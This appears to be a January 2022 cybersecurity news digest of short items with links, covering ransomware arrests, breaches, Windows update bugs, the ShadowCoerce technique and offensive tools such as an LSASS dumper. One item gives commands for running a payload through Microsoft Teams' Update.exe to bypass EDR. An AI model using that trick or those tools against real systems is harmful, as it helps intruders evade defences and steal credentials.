
🇺🇦 Cyberpolice exposed a hacker group that attacked foreign companies with ransomware

cyberpolice.gov.ua/news/kiberp

🇺🇦 SBU exposed Ukrainians who built a service for hackers and stole a million dollars from 50 foreign companies

ssu.gov.ua/novyny/sbu-vykryla-

On 4 January 2022, Unfallkasse Thüringen (ukt.de) fell victim to a cyberattack. The attackers succeeded in encrypting all servers with ransomware.

ukt.de/unser-service/aktuelles

Imagine a future where moral and cognitive battles are waged with well-crafted narratives delivered and manipulated by an intricate web of simple and sophisticated cyber, information, electronic, and psychological warfare tools.

mwi.usma.edu/rethinking-man-tr

Security Alert - U.S. Embassy Kyiv, Ukraine (January 12, 2022)
The Department of State continues to advise U.S. citizens to reconsider travel to Ukraine due to increased threats from Russia.

ua.usembassy.gov/security-aler

ShadowCoerce - Coercing the domain controller machine account to authenticate to a host which is under the control of a threat actor could lead to domain compromise.

pentestlaboratories.com/2022/0

ShadowCoerce - Domain controllers which are running the VSS Agent Service could provide an opportunity for domain escalation.

youtube.com/watch?v=8ChZDeizjI

A 19-year-old German IT security specialist, David Colombo, quietly hacked several Teslas located on the other side of the world. As a result, he could remotely perform a whole range of actions, each more impressive than the last.

iphonesoft.fr/2022/01/12/hacke

A teenage security researcher, David Colombo, claimed that he can remotely control various functions in 25 Teslas across 13 countries. Tesla

nasdaq.com/articles/teenage-re

Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory

github.com/optiv/Ivy

How to bypass EDR with Microsoft Teams?

  • Copy payload into: %userprofile%\AppData\Local\Microsoft\Teams\current\

  • Then: %userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "args"

Credit: Elli (IR)

ParseFortinetSerialNumber - A tool to parse Fortinet product serial numbers and detect the associated model and version.

github.com/p0dalirius/ParseFor

MirrorDump - Another LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory.

github.com/snovvcrash/MirrorDu

[PDF] A comprehensive set of reverse engineering tutorials covering x86 and x64 as well as 32-bit and 64-bit ARM architectures.

0xinfection.github.io/reversin

🇺🇸 The health information management services provider CIOX Health (cioxhealth.com) has suffered a data breach that has affected at least 32 healthcare providers. CIOX Health started notifying affected healthcare provider clients about the breach on December 30, 2021. CIOX Health has reported the breach to the HHS' Office for Civil Rights as affecting 12,493 individuals.

hipaajournal.com/over-30-healt

New Windows Server updates cause DC boot loops, break Hyper-V. The most serious issue introduced by these updates is that Windows Domain Controllers enter a boot loop, with servers getting into an endless cycle of starting and then rebooting after a few minutes. After the updates are installed, Resilient File System (ReFS) volumes are no longer accessible or are seen as RAW (unformatted). In addition to the boot loops, Hyper-V no longer starts on the server. Microsoft released security updates to fix four different Hyper-V vulnerabilities yesterday (CVE-2022-21901, CVE-2022-21900, CVE-2022-21905, and CVE-2022-21847), which are likely causing this issue.

bleepingcomputer.com/news/micr

🇬🇧 More than 50,000 letters sent by banks and local authorities were indexed by Google following an error by the outsourcing company Virtual Mail Room (vmailroom.co.uk)

wired.co.uk/article/virtual-ma
